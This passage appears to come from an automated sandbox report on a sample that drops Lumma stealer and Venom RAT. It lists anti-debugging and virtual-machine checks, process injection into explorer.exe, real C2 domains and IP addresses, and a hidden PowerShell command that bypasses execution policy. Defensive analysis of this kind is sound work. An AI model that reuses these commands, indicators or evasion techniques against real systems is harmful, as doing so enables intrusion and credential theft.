1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUEFI ROM imageAlign 2-BytesAlign 4-BytesAlign 8-Bytesby_start_timeDRAINING_SUBSDRAINING_PU
Source: explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2751996058.0000000003385000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000002.3064823525.0000000000514000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2721074628.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2711751965.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2709067186.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2748207856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2722685463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2710272272.000000000054E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: explorer.exe, 00000001.00000000.1700000036.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: EF14.exe Binary or memory string: .brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunct
Source: explorer.exe, 00000001.00000000.1697734591.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: BitLockerToGo.exe, 00000010.00000002.2751996058.000000000334B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: 2D42.exe, 0000000A.00000002.2815804858.000001E01D94A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: explorer.exe, 00000001.00000000.1699388658.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: EF14.exe, 00000009.00000002.2563763619.000001FBFEF48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2710861827.000001B9D1260000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000013.00000002.4108045764.0000000000694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000017.00000002.2771894139.0000020017A57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EF14.exe Binary or memory string: W5Y0tdCLLaYcvsKzyKBjidpmE1BHc86vjlhun29UAQ6rJZ1+hAUJMv6yDSm77LFR/At8wqZArKFjRxye1Iekrog93ttnyK5FEDw6+RPvmPZJmn2Ny6c69E2SUhEO/vtkGH1tLlOBSTv07SHKhP/k6uLKuu96C1dMI7KMMDP4XkpI2+Y6DismsMB9BV85H06QXorwQF/T+HT6QsQfi/vOoJWQZYuU+4o6mvX48r/Ht0VEJcT/p2XyRwBvMciXpPpRvoj9
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC3329 CheckRemoteDebuggerPresent, 10_2_00007FFD9BAC3329
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03089D10 LdrInitializeThunk, 16_2_03089D10
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8EDF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_6C8EDF8B
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D64F0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess, 19_2_6C8D64F0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8EF853 mov eax, dword ptr fs:[00000030h] 19_2_6C8EF853
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8ED49D mov ecx, dword ptr fs:[00000030h] 19_2_6C8ED49D
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C87F853 mov eax, dword ptr fs:[00000030h] 20_2_6C87F853
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C87D49D mov ecx, dword ptr fs:[00000030h] 20_2_6C87D49D
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8F6CF0 GetProcessHeap,HeapAlloc, 19_2_6C8F6CF0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8EDF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_6C8EDF8B
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E8B9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_6C8E8B9F
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E90B9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_6C8E90B9
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C87DF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_6C87DF8B
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C878B9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_6C878B9F
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C8790B9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_6C8790B9
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 8EC7.exe.1.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 77.221.157.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.139 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.137 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.235.84 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 109.172.114.212 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 64.190.113.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 186.145.236.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 167.235.128.153 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.144.253.197 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.149.100.242 443 Jump to behavior
.NET source code references suspicious native API functions
Source: 2D42.exe.1.dr, SAPIENHost.cs Reference to suspicious API methods: FindResource(hINSTANCE, new IntPtr(num), new IntPtr(10))
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Keylogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 19.2.vm.exe.4e40000.1.raw.unpack, DInvokeCore.cs Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 19.2.vm.exe.4e40000.1.raw.unpack, AntiProcess.cs Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory allocated: C:\Windows\explorer.exe base: 3010000 protect: page read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory allocated: C:\Windows\explorer.exe base: 3060000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory allocated: C:\Windows\explorer.exe base: 3070000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory allocated: C:\Windows\explorer.exe base: 3080000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 protect: page execute and read and write Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Changes memory attributes in foreign processes to executable or writable
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory protected: C:\Windows\explorer.exe base: 3010000 protect: page execute and read and write Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Thread created: C:\Windows\explorer.exe EIP: 7D819D0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Thread created: unknown EIP: 33E19D0 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 value starts with: 4D5A Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: PID: 2580 base: 3010000 value: 20 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: PID: 2580 base: 3011000 value: 48 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: PID: 2580 base: 3080030 value: 00 Jump to behavior
LummaC encrypted strings found
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: indexterityszcoxp.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: lariatedzugspd.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: callosallsaospz.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: outpointsozp.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: liernessfornicsa.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: upknittsoappz.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: shepherdlyopzc.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: unseaffarignsk.shop
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: C:\Windows\explorer.exe base: 3010000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: C:\Windows\explorer.exe base: 3011000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: C:\Windows\explorer.exe base: 3080030 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F5F008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Users\user\AppData\Local\Temp\2D42.exe "C:\Users\user\AppData\Local\Temp\2D42.exe" -HOSTRUNAS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64166F310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership, 7_2_00007FF64166F310
Source: explorer.exe, 00000001.00000000.1697550240.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2D42.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
